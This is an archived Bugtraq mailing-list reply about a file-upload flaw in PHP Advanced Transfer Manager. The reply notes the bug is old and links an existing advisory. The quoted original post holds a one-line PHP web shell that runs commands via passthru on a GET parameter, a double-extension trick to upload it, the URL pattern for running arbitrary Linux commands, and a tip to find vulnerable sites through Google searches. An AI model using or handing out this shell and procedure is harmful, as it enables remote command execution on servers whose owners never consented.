[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: uplod phpshell in PHP Advanced Transfer Manager
- To: sQl@xxxxxxxxxxx, bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Re: uplod phpshell in PHP Advanced Transfer Manager
- From: D_BuG <d_bug@xxxxx>
- Date: Sun, 30 Oct 2005 06:23:00 +0300
Read link =)
http://www.securityfocus.com/bid/13542/exploit
This old bug ;)
Good luke discovered!
> <
> uplod phpshell in PHP Advanced Transfer Manager
> one save as the code :
> --------
> <pre>
> <?
> passthru($_GET['sQl']);
?>>
> --------
file >> save as > sQl.php.ns
> now upload in the PHP Advanced Transfer Manager
> end the upload go to >
> www.site.com/[file upload name]/[files]/sQl.php.ns?sQl=[command linux]
> search google :
> PHP Advanced Transfer Manager
> }
> by sQl
> sQl[at]homail.[com]
> {
>>
--
С уважением, Денис.